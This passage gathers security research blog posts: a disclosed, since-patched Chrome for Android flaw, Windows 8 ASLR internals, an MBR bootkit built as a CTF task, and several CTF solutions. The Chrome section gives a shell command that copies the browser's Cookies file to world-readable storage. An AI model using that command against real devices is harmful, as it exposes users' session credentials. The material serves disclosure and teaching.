Voilà, JavaScript has been executed in the context of the domain www.google.ru.

CREDENTIAL DISCLOSURE

Another problem, automatic file downloading, was a real headache for all Chrome-like browsers. If you opened a binary file in the Chrome browser, it was downloaded to the SDCard directory without your approval. The same thing happened with the default browser, where this "feature" was used by the NotCompatible malware. So you may ask what this has to do with credential disclosure. Look at the Chrome directory on the system.



These files (such as Cookies, History, etc.) can be read only by the Chrome app, which looks secure. Now try to launch Chrome using the file:// wrapper and open the Cookies file.

shell@android:/ $ am start -n com.android.chrome/com.android.chrome.Main -d 'file:///data/data/com.android.chrome/app_chrome/Default/Cookies'


When the browser starts, the cookies are downloaded/copied to /sdcard/Downloads/Cookies.bin and can be read by any application on the system.

I provided detailed information to the Chromium security team, and these bugs were fixed in version 18.0.1025308.

Links:
http://code.google.com/p/chromium/issues/detail?id=138035
http://code.google.com/p/chromium/issues/detail?id=138210

Author: Artem Chaykin, Positive Research.

Workshop «Random Numbers. Take Two» at ZeroNights 2012


Attacking MongoDB

Mikhail Firstov, an expert at Positive Technologies, spoke at ZeroNights 2012, which recently took place in Moscow. The talk was about attacking a popular DBMS, MongoDB.

The presentation and attack video demo are under the cut.


REST:



Sniff:



Github.

Windows 8 ASLR Internals

Authors: Artem Shishkin and Ilya Smith, Positive Research.

ASLR stands for Address Space Layout Randomization. It is a security mechanism that randomizes the virtual memory addresses of various data structures that may be attacked. Since it is difficult to predict where the target structure is located in memory, an attacker has little chance to succeed.

ASLR implementation on Windows is closely related to the image relocation mechanism. In fact, relocation allows a PE file to be loaded at an address other than its fixed preferred image base. The PE file's relocation section is the key structure in the relocating process: it describes how to modify certain code and data elements of the executable to ensure proper functioning at another image base.

The key part of ASLR is a random number generator subsystem and a couple of stub functions that modify the image base of a PE file, which is going to be loaded.

Windows 8 ASLR relies on a random number generator (actually a lagged Fibonacci generator with parameters j=24 and k=55) that is seeded at Windows startup in the winload.exe module. Winload.exe gathers entropy at boot time from different sources: registry keys, the TPM, time, ACPI, and the new rdrand CPU instruction. The Windows kernel random number generator and its initialization are described in detail in [1].

We would like to give a small note about the new rdrand CPU instruction. The Ivy Bridge architecture of Intel processors has introduced the Intel Secure Key technology for generating high-quality pseudo-random numbers. It consists of a hardware digital random number generator (DRNG) and a new instruction rdrand, which is used to retrieve values from DRNG programmatically.

As a hardware unit, the DRNG is a separate module on the processor chip. It operates asynchronously with the main processor cores at a frequency of 3 GHz and uses thermal noise as its entropy source. It also has a built-in testing system performing a series of tests to ensure high-quality output; if one of these tests fails, the DRNG refuses to generate random numbers at all.

The RDRAND instruction is used to retrieve random numbers from the DRNG. The documentation states that theoretically the DRNG can return zeros instead of a random number sequence due to a health test failure or if the generated random number queue is empty. However, we were unable to drain the DRNG in practice.

Intel Secure Key is a really powerful random number generator producing high-quality random numbers at a very high speed. Unlike other entropy sources, it is practically impossible to guess the initial state of an RNG initialized with the rdrand instruction.

The internal RNG interface function is ExGenRandom(), which also has an exported wrapper, RtlRandomEx(). Windows 8 ASLR uses this function, as opposed to the previous version, which relied on the rdtsc instruction. The rdtsc instruction retrieves the CPU timestamp counter, which changes linearly and therefore cannot be considered a secure random number source.

The core function of the ASLR mechanism is MiSelectImageBase. On Windows 8 it has the following pseudocode.
#define MI_64K_ALIGN(x) ((x + 0x0F) >> 4)
#define MmHighestUserAddress 0x7FFFFFEFFFF

typedef ULONG_PTR PIMAGE_BASE;

typedef enum _MI_MEMORY_HIGHLOW {
    MiMemoryHigh    = 0,
    MiMemoryLow     = 1,
    MiMemoryHighLow = 2
} MI_MEMORY_HIGHLOW, *PMI_MEMORY_HIGHLOW;

MI_MEMORY_HIGHLOW MiSelectBitMapForImage(PSEGMENT pSeg)
{
    if (!(pSeg->SegmentFlags & FLAG_BINARY32))   // WOW binary
    {
        if (!(pSeg->ImageInformation->ImageFlags & FLAG_BASE_BELOW_4GB))
        {
            if (pSeg->BasedAddress > 0x100000000)
                return MiMemoryHighLow;
            else
                return MiMemoryLow;
        }
    }
    return MiMemoryHigh;
}

PIMAGE_BASE MiSelectImageBase(void *a1 /* rcx */, PSEGMENT pSeg)
{
    MI_MEMORY_HIGHLOW ImageBitmapType;
    ULONG ImageBias;
    RTL_BITMAP *pImageBitMap;
    ULONG_PTR ImageTopAddress;
    ULONG RelocationSizein64k;
    MI_SECTION_IMAGE_INFORMATION *pImageInformation;
    ULONG_PTR RelocDelta;
    PIMAGE_BASE Result = NULL;   // rsi = rcx; rcx = rdx; rdi = rdx

    pImageInformation = pSeg->ImageInformation;
    ImageBitmapType = MiSelectBitMapForImage(pSeg);
    a1->off_40h = ImageBitmapType;

    if (ImageBitmapType == MiMemoryLow)
    {
        // 64-bit executable with the image base below 4 GB
        ImageBias = MiImageBias64Low;
        pImageBitMap = MiImageBitMap64Low;
        ImageTopAddress = 0x78000000;
    }
    else if (ImageBitmapType == MiMemoryHighLow)
    {
        // 64-bit executable with the image base above 4 GB
        ImageBias = MiImageBias64High;
        pImageBitMap = MiImageBitMap64High;
        ImageTopAddress = 0x7FFFFFE0000;
    }
    else
    {
        // MiMemoryHigh: 32-bit executable image
        ImageBias = MiImageBias;
        pImageBitMap = MiImageBitMap;
        ImageTopAddress = 0x78000000;
    }

    // pSeg->ControlArea->BitMap ^= (pSeg->ControlArea->BitMap ^ (ImageBitmapType << 29)) & 0x60000000;
    // or, in bitfield form:
    pSeg->ControlArea.BitMap = ImageBitmapType;

    RelocationSizein64k = MI_64K_ALIGN(pSeg->TotalNumberOfPtes);

    if (pSeg->ImageInformation->ImageCharacteristics & IMAGE_FILE_DLL)
    {
        ULONG StartBit = 0;
        ULONG GlobalRelocStartBit = 0;

        StartBit = RtlFindClearBits(pImageBitMap, RelocationSizein64k, ImageBias);
        if (StartBit != 0xFFFFFFFF)
        {
            StartBit = MiObtainRelocationBits(pImageBitMap, RelocationSizein64k, StartBit, 0);
            if (StartBit != 0xFFFFFFFF)
            {
                Result = ImageTopAddress - ((RelocationSizein64k + StartBit) << 0x10);
                if (Result == (pSeg->BasedAddress - a1->SelectedBase))
                {
                    GlobalRelocStartBit = MiObtainRelocationBits(pImageBitMap, RelocationSizein64k, StartBit, 1);
                    StartBit = (GlobalRelocStartBit != 0xFFFFFFFF) ? GlobalRelocStartBit : StartBit;
                    Result = ImageTopAddress - ((RelocationSizein64k + StartBit) << 0x10);
                }

                a1->RelocStartBit = StartBit;
                a1->RelocationSizein64k = RelocationSizein64k;
                pSeg->ControlArea->ImageRelocationStartBit = StartBit;
                pSeg->ControlArea->ImageRelocationSizeIn64k = RelocationSizein64k;
                return Result;
            }
        }
    }
    else   // EXE image
    {
        if (a1->SelectedBase != NULL)
        {
            return pSeg->BasedAddress;
        }
        if (ImageBitmapType == MiMemoryHighLow)
        {
            a1->RelocStartBit = 0xFFFFFFFF;
            a1->RelocationSizein64k = (WORD)RelocationSizein64k;
            pSeg->ControlArea->ImageRelocationStartBit = 0xFFFFFFFF;
            pSeg->ControlArea->ImageRelocationSizeIn64k = (WORD)RelocationSizein64k;
            return ((DWORD)(ExGenRandom(1) % (0x20001 - RelocationSizein64k)) + 0x7F60000) << 16;
        }
    }

    ULONG RandomVal = ExGenRandom(1);
    RandomVal = (RandomVal % 0xFE + 1) << 0x10;

    RelocDelta = pSeg->BasedAddress - a1->SelectedBase;
    if (RelocDelta > MmHighestUserAddress) return 0;
    if ((RelocationSizein64k << 0x10) > MmHighestUserAddress) return 0;
    if (RelocDelta + (RelocationSizein64k << 0x10) <= RelocDelta) return 0;
    if (RelocDelta + (RelocationSizein64k << 0x10) > MmHighestUserAddress) return 0;

    if (a1->SelectedBase + RandomVal == 0)
    {
        Result = pSeg->BasedAddress;
    }
    else if (RelocDelta > RandomVal)
    {
        Result = RelocDelta - RandomVal;
    }
    else
    {
        Result = RelocDelta + RandomVal;
        if (Result < RelocDelta) return 0;
        if (((RelocationSizein64k << 0x10) + RelocDelta + RandomVal) > 0x7FFFFFDFFFF) return 0;
        if (((RelocationSizein64k << 0x10) + RelocDelta + RandomVal) < (RelocDelta + (RelocationSizein64k << 0x10))) return 0;
    }

    // random_epilog
    a1->RelocStartBit = 0xFFFFFFFF;
    a1->RelocationSizein64k = RelocationSizein64k;
    pSeg->ControlArea->ImageRelocationStartBit = 0xFFFFFFFF;
    pSeg->ControlArea->ImageRelocationSizeIn64k = RelocationSizein64k;
    return Result;
}
As we can see, there are three different image bitmaps: the first one is for 32-bit executables, the second is for x64, and the third is for x64 images with the image base above 4 GB, which grants them a high-entropy virtual address.

The executables are randomized by a direct modification of the image base. As for DLLs, ASLR is a part of relocation, and the random part of the image base selection process is ImageBias, a value that is initialized during system startup.
VOID MiInitializeRelocations()
{
    MiImageBias       = ExGenRandom(1) % 256;
    MiImageBias64Low  = ExGenRandom(1) % MiImageBitMap64Low.SizeOfBitMap;
    MiImageBias64High = ExGenRandom(1) % MiImageBitMap64High.SizeOfBitMap;
    return;
}
Image bitmaps represent the address space of the running user processes. Once an executable image is loaded, it will have the same address in all the processes that reference it. This is natural for efficiency and memory usage optimization, since executables use the copy-on-write mechanism.
ASLR as implemented on Windows 8 can now force images that are not ASLR-aware to be loaded at a random virtual address. The table below demonstrates the loader's behavior with different combinations of ASLR-relevant linker flags.


*Cannot be built with MSVS because the /DYNAMICBASE option also implies /FIXED:NO, which generates a relocation section in an executable.

We can see that the loader's behavior changed in Windows 8: if a relocation section is present in the PE file, the image will be relocated anyway. This also proves that ASLR and the relocation mechanism are really interconnected.

Generally, we can say that the implementation of the new ASLR features on Windows 8 doesn't much influence the code logic, which is why it is difficult to find any profitable vulnerabilities in it. The entropy increase for randomizing various objects is, in fact, the substitution of a constant expression in the code. The code graphs also show that a code review has been done.

References:

[1] Chris Valasek, Tarjei Mandt. Windows 8 Heap Internals. 2012.
[2] Ken Johnson, Matt Miller. Exploit Mitigation Improvements in Windows 8. Slides, Black Hat USA 2012.
[3] Intel. Intel® Digital Random Number Generator (DRNG): Software Implementation Guide. Intel Corporation, 2012.
[4] Ollie Whitehouse. An Analysis of Address Space Layout Randomization on Windows Vista. Symantec Advanced Threat Research, 2007.
[5] Alexander Sotirov, Mark Dowd. Bypassing Browser Memory Protections. 2008.

PHDays CTF Quals – BINARY 500 or Hiding Flag Six Feet Under (MBR Bootkit + Intel VT-x)

PHDays CTF Quals took place on December 15-17, 2012. More than 300 teams participated in this event and fought for a place in PHDays III CTF, which is going to be held in May 2013. Our team had been developing the tasks for this competition for two months, and this article is devoted to the secrets of one of them, Binary 500. This task is so unusual and hard to solve that nobody found its flag.

This executable file is an MBR bootkit that uses hardware virtualization (Intel VT-x). Due to the program's specific features, we decided to warn users that it should be executed only on a virtual machine or an emulator.


 Warning and license agreement

Dropper

Let's start with the dropper overview. The main goal of this module is very simple: to write the files extracted from the resource section into a self-made hidden file system and to replace the original MBR with a self-made one, saving the original MBR in the file system. A few things complicate the dropper analysis. First of all, it is written in C++ using STL, OOP, and virtual functions, which is why all the calls are indirect.



 Virtual function calls in IDA Pro

Secondly, all the disk operations are carried out via the SCSI controller. Instead of the usual ReadFile/WriteFile functions, we use DeviceIoControl with the IOCTL_SCSI_PASS_THROUGH_DIRECT control code, which allows communicating with the hard drive on a lower level.

All the files from the resources are encrypted using RC4 and a 256-bit key.

The next thing is the hidden file system. Its structure is pretty simple: it grows from the end of the disk and is written starting two sectors before the end of the hard drive. The first DWORD is the number of files XORed with the constant 0x8FC54ED2. Then comes a directory with information about the files:

struct MiniFsFileEntry
{
    DWORD fileIndex;
    DWORD fileOffset;
    DWORD fileSize;
};

The file index is just a constant related to a specific file. The offset is counted in bytes relative to the file system start.

 MiniFs file system structure
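For illustration, a directory parser for such a layout might look as follows. This is a minimal sketch assuming the structure described above; the exact size of the directory area is a guess.

import struct

SECTOR = 512
XOR_CONST = 0x8FC54ED2

def read_minifs_dir(image_path):
    """Read the MiniFs directory that starts two sectors before the end."""
    with open(image_path, 'rb') as f:
        f.seek(-2 * SECTOR, 2)                    # two sectors before the end
        data = f.read(2 * SECTOR)
    num_files = struct.unpack_from('<I', data, 0)[0] ^ XOR_CONST
    entries = []
    for i in range(num_files):                    # MiniFsFileEntry records
        idx, off, size = struct.unpack_from('<III', data, 4 + i * 12)
        entries.append({'fileIndex': idx, 'fileOffset': off, 'fileSize': size})
    return entries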

MBR

After the dropper finishes its operation, we have nothing left to do in the operating system: we just need to reboot and start debugging the master boot record. There are several ways to debug an MBR. We could, no doubt, analyze it on a real machine using a hardware debugger, but that is inconvenient and expensive. That is why we recommend using the VMWare virtual machine (you first need to adjust the image configuration file) connected to the GDB debugger (this method has significant drawbacks, which will be described later) or the Bochs emulator. The main advantage of these methods is that you can use the IDA Pro debugger for the analysis, which is very convenient!

Having chosen our instruments, we can get started. The first part of the MBR is really simple, and there shouldn't be any problems with its analysis. It only reads the second part of our MBR (the extended MBR) from the hard drive and writes it to memory at address 0x7e00 (right after the first part). This operation is important because the BIOS maps just the first 512 bytes of the MBR, and our code exceeds this size.

When analyzing the extended MBR, a good specialist will immediately notice that something is wrong, namely that the loader is obfuscated.


Comparison of MBR source code with the IDA Pro analysis

The obfuscation relies mainly on indirect function calls. At the very beginning, the AX register receives the address of a function that scans a special table (containing function indexes and the related offsets) to get the offset of the function to be called. After that function completes, control returns to the instruction right after the function index constant (return address + 2).


Function table in MBR
MBR obfuscation algorithm

The MBR code is pretty simple:

  1. Retrieves the hard drive features.
  2. Reads the original MBR from the hidden file system.
  3. Replaces our MBR with the original one at the 0x7c00 address.
  4. Reads and decrypts the hypervisor loader from the file system.
  5. Reads and decrypts the hypervisor body from the file system.
  6. Prepares parameters and passes control to the hypervisor loader.

It should be mentioned that a set of bytes from the Bochs BIOS was used to encrypt the hypervisor loader and body. This makes the program system-specific: it runs correctly only on the Bochs emulator. We chose this method for several reasons. Firstly, debugging Intel VT-x hardware virtualization is possible only on a real machine or using Bochs 2.4.5 or later (so we were already tied to this emulator). Secondly, we didn't want the participants to find the encryption keys in the program and decrypt all the hypervisor parts using static analysis alone, without the debugger. Thirdly, this method prevents users from damaging systems on real machines.

To help the participants, we had published in advance that they would need the Bochs emulator with a working OS image to solve one of the tasks.

VMX Loader

Hardware virtualization is not a new term. It started to spread in 2006-2007, when the best-known CPU developers (Intel and AMD) released processors supporting the related instruction sets. Details on the virtual machine monitor will be provided in the next section; this section touches upon how to prepare the system for the hardware hypervisor.

As mentioned above, it is possible to debug an application that uses Intel VT-x virtualization only on a real machine or using Bochs 2.4.5 or later, but that is not the only problem. The default emulator build does not support hardware virtualization, which is why we had to compile our own build of Bochs and provide a link to it in the first hint for the task.

The main goal of the hypervisor loader is to move the hypervisor's body above the first megabyte and transfer control to its entry point. However, it also carries out some non-trivial operations, which will be covered below.

There are several input parameters including a base address, which is used as a code segment base. It is set by a far jump.

Then the CPUID instruction checks that the code is executed on an Intel system (function zero) and that hardware virtualization is supported by the processor (function one). Let's take a closer look. First, we call CPUID with the value 1 in the EAX register. After the execution, the fifth bit of the ECX register (the VMX flag) should be checked: if it is set, hardware virtualization is supported. To check whether virtualization was blocked at the early boot stages (in the BIOS), we need to read the 0x3A MSR. If, after the RDMSR instruction executes, the first bit of the EAX register is set and the second bit is clear, then virtualization is blocked.

Then the loader calls a function that reads the system memory map. This is achieved by calling interrupt 0x15 in a loop with the value 0xE820 in the EAX register; this is how the buffer is filled with records describing memory regions. The memory map is then searched for a free area suitable for the monitor body, and if such a region is found, it is marked as reserved.

To move the monitor body above the first megabyte, we need to switch the processor from real mode to protected or long mode. We decided to switch directly to long mode, since the hypervisor body works in it. Several conditions must be satisfied: prepare the paging structures (PML4, PDPT, and a number of PDs for 2 MB pages), set the PAE bit in the CR4 register, load the PML4 address into the CR3 register, set up GDTR with the long-mode segment descriptors, set the LMA bit in the EFER MSR, and set the PG and PE bits in the CR0 register. After these operations, we make a far jump to switch the processor to long mode.

At this point we noticed that the IDA Pro 6.1 debugger has a bug that prevents it from calculating the correct far address, showing garbage data to the user instead (this bug is fixed in IDA 6.3). It seems that IDA does not use register values from the Bochs debugger and makes the calculations, incorrectly, by itself. That is why we recommended the participants to use the built-in Bochs debugger.

The last step is to copy the body to the destination address and transfer control to the entry point.

VMX Hypervisor

Specifically for this task we wrote a thin hypervisor, which:

  • Enters the VMX-root mode.
  • Sets the VMCS structure to start the guest system in the real mode starting from the 0x7c00 address.
  • Sets up guest exit handlers.
  • Starts a guest by executing the VMLAUNCH instruction.

The main goal of a participant is to find a guest system exit handler and analyze its code.

Flag

Having obtained the virtual machine exit handler, a participant came to the final stretch, where only a small task remained to be solved.

It is obvious from the handler's code that if the CPUID instruction causes an exit and the EIP register contains a specific value, the handler creates a 32-byte array from the values of the registers EAX, ECX, EDX, EBX, ESI, EDI, ESP, EBP and then checks this array for validity. The handler inserts the vector (x_0, …, x_31) into a set of equations of the following type:
If the equality is satisfied, the vector is valid and is used as the key for buffer decryption. Therefore, a participant needs to solve a set of 32 equations in 32 variables. The only thing complicating the analysis is that the validation algorithm uses the floating point unit (FPU) instruction set.

The encrypted buffer contains one more (final) MBR with a plaintext flag. This bootstrap code substitutes the original MBR, and its goal is to display the flag on the screen.


Example of a displayed flag

Test application

Specifically for testing, we developed an application that allocates memory at a given address, writes CPUID and a few other instructions at a specific offset (address + offset = the needed EIP value), sets up the registers, and passes control to the given address. Therefore, when the CPUID instruction is executed, the hypervisor takes control, checks the register values, and reboots the system, displaying the flag on the screen.


Example of a test application

Conclusion

In developing this application, we wanted to create something unusual, a program that would be interesting for the whole team: solving this task required skills in Win32 reverse engineering, analysis of MBR code executed in real mode, and analysis of encryption and obfuscation algorithms. The task required both static and dynamic analysis. The participants needed basic knowledge of hardware virtualization and x86-64 assembler, plus mathematical skills, to obtain the flag.

We really hope that we managed to interest both the participants and the readers of this review!

From the authors

We decided to write this task three weeks before the start of the qualifications and were absolutely sure we would finish very soon, but our expectations were not met. We finished the task just a few hours before PHDays CTF Quals started and had no time to test it or fix the bugs. We were only sure that it was possible to obtain the flag, but the operating system ran poorly in the virtual environment: it displayed blue screens of death from time to time and refused to boot after a system reset. While writing this article, we had some time to fix the bugs and release a more stable version of the task. Unfortunately, this time was not enough to tame the operating system either. Follow the links to download the latest version of the task and watch the video demonstrating the task and the test application in operation.

Thanks to everybody!

Task Archive

Max Grigoryev, Sergey Kovalev, Positive Research 

Labyrinth, Noise Elimination, Circuit Engineering... Review of the Most Interesting Tasks of PHDays CTF Quals

PHDays CTF Quals, an information security competition, ended last week. 493 teams from 30 countries competed in hacking and protecting information. All the tasks were divided into five categories, from reverse engineering to tasks typical of the real world (the details and results of the competition are available in our previous post). Each category included five tasks of different difficulty levels (from 100 to 500 points).

The majority of the tasks were solved by the teams, some caused trouble, and some were left unsolved. Moreover, for some of the tasks the teams used solutions that were not even considered by the organizers. This time we want to review the most interesting (in our opinion) and difficult tasks of PHDays CTF Quals.

Misc 400

An interactive service offered the participants to find a path in a 3D labyrinth (a 50×50 cube with multiple corridors inside).

Each time a team went through a labyrinth, another one appeared, 16 in total. A hint was given in the middle of the task: "A point of view does matter". Viewed in one of the three projections, the path through each labyrinth forms one character of the answer.

Therefore, 16 labyrinths give us the 16 characters of the flag: NOF3ARNO3XITHER3.
When the last labyrinth was solved, the service popped up a message with the following text: "You win! How do you like the flag? ;)" and closed the connection. Such an unexpected end of the task caused cognitive dissonance in many participants. :)

Follow the link to view the path projections.

Github code.

Bin300 (HashME) – Hash with Modular Exponent

A binary file of 754 bytes was provided.

The task was formulated as follows: "Find the valid password, and you will find the cherished flag".
 The file included the following strings: Bad pwd, hex, sys, hashlib, argv, isalnum, len, Exception, chr, pow, int, encode, md5, hexdigest, <module>.

Judging by the strings, it is easy to guess that the file contains Python byte-code, which is also confirmed by GNU file: "python 2.7 byte-compiled".

There is a decompiler named uncompyle for Python 2.7.

Install it, launch it, and receive the decompiled text:
import sys, hashlib
(5, 1, 3, 6,) = (10018627425667944010192184374616954034932336288972070602267764174849233338727414964592990350312034463496546535924460513481267263055398790908691402854122123L,
7548218116432136940925610514648634474612691039131890951895054656437277296127635726026902728136306678987800886118938655787775411887815467753774352743068577L,
6192128262312421513644888506697421915171917575080330421897398651929773466194971539791158995262083381167771056580666419101167108372547406447696753234781064L,
sys.argv[-1])
if not 6.isalnum() or len(6) > 10:
    raise Exception('Bad pwd')
0 = (chr(len(6)) + 6) * 32
2 = pow(1, int(0[:64].encode('hex'), 16), 5)
if 3 != 2:
    print hex(2)
else:
    print hashlib.md5(6).hexdigest()
It is evident that something is wrong with the code: it cannot even be parsed. The reason is very simple: variable names were replaced with small numbers in the compiled file. This hardly prevents byte-code execution, but after decompiling, the variable names begin with digits, and the parser considers that an error.

To fix it, you only need to insert a letter before each such number, or use the first hint:
Python 2.7, "pgxweh"<=>"513602"
Properly functioning code should look as follows:
import sys, hashlib
(p, g, x, w,) = (10018627425667944010192184374616954034932336288972070602267764174849233338727414964592990350312034463496546535924460513481267263055398790908691402854122123L,
7548218116432136940925610514648634474612691039131890951895054656437277296127635726026902728136306678987800886118938655787775411887815467753774352743068577L,
6192128262312421513644888506697421915171917575080330421897398651929773466194971539791158995262083381167771056580666419101167108372547406447696753234781064L,
sys.argv[-1])
if not w.isalnum() or len(w) > 10:
    raise Exception('Bad pwd')
e = (chr(len(w)) + w) * 32
h = pow(g, int(e[:64].encode('hex'), 16), p)
if x != h:
    print hex(h)
else:
    print hashlib.md5(w).hexdigest()
The code makes it clear that if the correct password is specified as the last argument on the command line, the hexadecimal MD5 value of this password (the flag) will be displayed. The password consists only of letters and digits, and its length is from 1 to 10 characters inclusive.

The password is converted to a Pascal string (a length byte plus the data), which is repeated to obtain 64 bytes. These 64 bytes are interpreted as a long integer, which becomes the exponent e. The password is deemed correct if pow(g, e, p) == x.

The values p, g, and x are known; p is a prime number, g is a multiplicative group generator, and e is to be found. This is the discrete logarithm problem, and 48 hours are not enough for a 512-bit p (as far as we know ;). However, there is a chance to brute-force the password.

A possible character set is 0-9A-Za-z. That is 62 variants. The maximum length is 10, thus the total number of possible passwords is: 

62^1 + 62^2 + 62^3 + ... + 62^10 == 853058371866181866 ≈ 2^59.6

Calculating a 512-bit modular exponent is quite slow, and it is hardly possible to brute-force even 2^28 variants on a single computer in 48 hours.

However, it is not necessary to calculate a modular exponent for each password, as the second hint makes clear:

g^(a+b) == g^a * g^b

Suppose we brute-force passwords of 3 characters. Then the exponent looks as follows in hexadecimal:

e = 03 XX YY ZZ 03 XX YY ZZ 03 XX YY ZZ … 03 XX YY ZZ

where XX, YY, and ZZ are password characters.

Taking into account the hint, the exponent can be written as 4 numbers:

e0 = 03 00 00 00 03 00 00 00 03 00 00 00 … 03 00 00 00
e1 = 00 XX 00 00 00 XX 00 00 00 XX 00 00 … 00 XX 00 00
e2 = 00 00 YY 00 00 00 YY 00 00 00 YY 00 … 00 00 YY 00
e3 = 00 00 00 ZZ 00 00 00 ZZ 00 00 00 ZZ … 00 00 00 ZZ

And then
pow(g,e,p) == (pow(g,e0,p) * pow(g,e1,p) * pow(g,e2,p) * pow(g,e3,p)) % p

It is remarkable that for passwords of a fixed length, e0 is constant, and thus pow(g,e0,p) does not change. Moreover, each pow(g,e[i],p) can take only one of 62 possible values, which can be calculated once. Changing one password character changes only one multiplier. Modular exponentiation is thus reduced to modular multiplication, increasing the speed by more than 500 times.
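A quick sanity check of this identity in Python 3 (the prime, the generator, and the password here are illustrative values, not the task's):

p = 2**127 - 1                                # any prime works for the check
g = 3
pwd = 'Ab3Z'

pattern = (chr(len(pwd)) + pwd) * 32          # Pascal string, repeated
e_full = int(pattern[:64].encode().hex(), 16)

# one exponent component per byte position within the repeating group
parts = []
for pos in range(len(pwd) + 1):
    buf = bytearray(64)
    for i in range(pos, 64, len(pwd) + 1):
        buf[i] = ord(pattern[i])
    parts.append(int(bytes(buf).hex(), 16))

assert sum(parts) == e_full                   # disjoint bytes, no carries
rhs = 1
for e_i in parts:
    rhs = rhs * pow(g, e_i, p) % p
assert pow(g, e_full, p) == rhs               # g^(e0+e1+...) == product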

However, even with all this done, it is still hardly possible to brute-force 2^60 variants within 48 hours. This time the third hint helps:

Meet In The Middle

The point is that modular multiplication is a reversible operation (at least in this case). Using the extended Euclidean algorithm, it is possible to calculate g^(-1) == g', the multiplicative inverse of g modulo p, so that (g*g') % p == 1.

Then if
(pow(g,e0,p) * pow(g,e1,p) * pow(g,e2,p) * pow(g,e3,p)) % p == x

then the following equation will be true:  

(pow(g,e2,p) * pow(g,e3,p)) % p == (x * pow(g’,e0,p) * pow(g’,e1,p)) % p

It allows us to "meet in the middle".

Mentally divide the password into two parts as close to the middle as possible. Brute-force all the variants of the shorter part, consecutively multiplying x by each of the values pow(g',e[i],p), and save the results in a table.
Then brute-force all the variants of the other part, consecutively multiplying 1 by each of the values pow(g,e[i],p) modulo p, and look each result up in the table. When the values match, you only need to recall which short password part generated that table element.

Because the password length is at most 10 characters, one half of the password is not longer than 5 characters, and 62^5 == 916132832 ≈ 2^29.8. So the task can be solved with fewer than 2^31 modular multiplications, which is feasible even on a single machine. Though, to store 2^29.8 512-bit values, almost 55 GB of memory would be needed.

However, firstly, you can store fewer than 512 bits per value (40 bits should be enough to keep the number of collisions close to zero). And secondly, the correct password contained only 9 characters, so 2 GB of RAM is already enough for the 62^4 variants.

We can vouch that a correctly written single-threaded Python program on a computer with a Core i5 3.1 GHz CPU finds any password of up to 8 characters inclusive in approximately 4 minutes, and any 9-character password in an hour and a half.

Binary – 400 (BoobFs)

This task is very interesting, but no team managed to solve it.
Input data:
  1. A BMP image (the file system image).
  2. Software to create a file system image out of files.

File system image as a picture

The file system consists of a main header and one directory, which includes a variable number of files and is divided into several blocks of variable length. Each file is also divided into blocks of variable length. The blocks are encrypted with the RC4 algorithm using a user key. The directory contains each file's name and size, plus the size and offset of the file's first block. Each block contains the offset and size of the next block. The file system grows from the end.
struct FS_HEADER
{
    DWORD signature;        // BOOB
    DWORD dirOffset;
    DWORD firstBlockSize;
};

struct DIR_BLOCK_HEADER
{
    BYTE  signature;        // D
    DWORD nextBlockOffset;
    DWORD nextBlockSize;
    DWORD numberOfFiles;
};

struct FILE_ENTRY
{
    CHAR  fileName[MAX_FNAME];   // MAX_FNAME = 20
    DWORD fileSizeInBytes;
    DWORD firstBlockOffset;
    DWORD firstBlockSize;
};

struct FILE_BLOCK_HEADER
{
    BYTE  signature;        // F
    DWORD nextBlockOffset;
    DWORD nextBlockSize;
};
An example of a file system structure (S is the number of blocks in the directory, Ni is the number of files in block i, P is the total number of files, equal to N0 + … + NS)

When the file system is created, all the data is transformed (a Base64 modification) and recorded into a two-dimensional array by a special formula; all the spare space is filled with pseudorandom numbers, and a BMP file is created on the basis of this array.

The function used for recording data to the array

The program is written in C++ using STL, OOP, and virtual functions, which makes the analysis of this application more complicated.

The task can be solved in several stages:

  1. Read the file data into a two-dimensional array (to eliminate the redundancy of the BMP format).
  2. Work out the formula used to read the data from the two-dimensional array.
  3. Work out the data conversion method and invert the algorithm (modified Base64).
  4. Brute-force the file system PIN.
  5. Work out the file system structure, write a program to traverse it, and extract all the files (16 in total).
  6. Compose a sentence from the file names, which will yield the flag.

Forensics500

The participants were provided with a network traffic dump in a pcap file containing the flag.

Port 554/udp indicated an RTP stream, most likely an audio one.


Task opened in Wireshark

Trying to listen to the audio, it becomes evident that music is playing against some noise, and sometimes noisier fragments appear. In fact, the stream consists of two streams. The RTP specification describes one bit used at the application level and defined by the profile. If this field is set, the packet data has a specific feature, by which the traffic can be divided into two streams. Now one of them plays the music, while noises and something like a voice can be heard in the other. This is the final part of the task: it is necessary to understand the nature of the noise and eliminate it. We should say that the noise is the XOR of the audio data with the byte 0xCC.
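Once the payload of the second stream has been extracted, removing the noise takes a couple of lines. A minimal sketch (the file names are illustrative):

def denoise(data, key=0xCC):
    """Strip the noise by XORing every audio byte with the key."""
    return bytes(b ^ key for b in data)

with open('voice_stream.raw', 'rb') as f:
    noisy = f.read()
with open('voice_clean.raw', 'wb') as f:
    f.write(denoise(noisy))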

      There are several ways for further task solution. Here is one of them.

      The less noisy fragments are most likely silence plus noise. Knowing the codec (it can be determined from the dump), generate your own audio file containing silence. By comparing the stream with this file, it is possible to work out the nature and type of the noise.
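
      This comparison is a known-plaintext attack: as the third hint below spells out, if a XOR x = b, then b XOR a = x. A small sketch, assuming the noisy fragment and the silence sample (both hypothetical inputs) are aligned byte for byte:

          def recover_key(noisy: bytes, silence: bytes) -> int:
              # XOR the suspected-silence fragment with real silence; for a
              # single-byte key, every position should yield the same value.
              candidates = {a ^ b for a, b in zip(noisy, silence)}
              assert len(candidates) == 1, "not pure silence, or wrong codec"
              return candidates.pop()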

      Alternatively, the XOR key can simply be guessed. In that case, the final part of the task feels much like tuning an analog radio: the closer the key is to the correct value, the purer the sound.

      As a result, once the noise was eliminated, a woman's voice spelled out the flag in English.

      During the competition, the participants were given the following hints, which reflect the main solution stages:

      Listen... the strange noise
      Simple noise over alphabet
      a?x=b b?x=a x?????

      PPP solved the task after the third hint, and some of the other participants came very close: using their own noise-elimination methods, they achieved good results, with answers off by only 1 or 2 characters.


      Misc500

      The participants were provided with a binary file for Electronics Workbench: a live project that could be opened, run, and debugged.


      Circuit appearance

      The circuit is obfuscated and consists of two parts. The first part contains the elements needed to display the message PHD3 on the indicators. The second (independent) part is a set of 32 binary/decimal/binary-decimal counters, the conversion rate of each encoding one flag character. The hint “Follow the counters” drew attention to them. The flag, an MD5 hash, is 32 HEX characters long, and the counters' conversion rates fall within the range [2;15]. A wire with pointers, connected to nothing, hinted at the order of the flag characters.
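
      Assuming each conversion rate maps directly to one hexadecimal digit of the flag, reading the flag off the counters is trivial; the rates below are placeholders, not the real values:

          # 32 conversion rates, read in the order indicated by the pointer
          # wire (placeholder values; the real ones come from the circuit).
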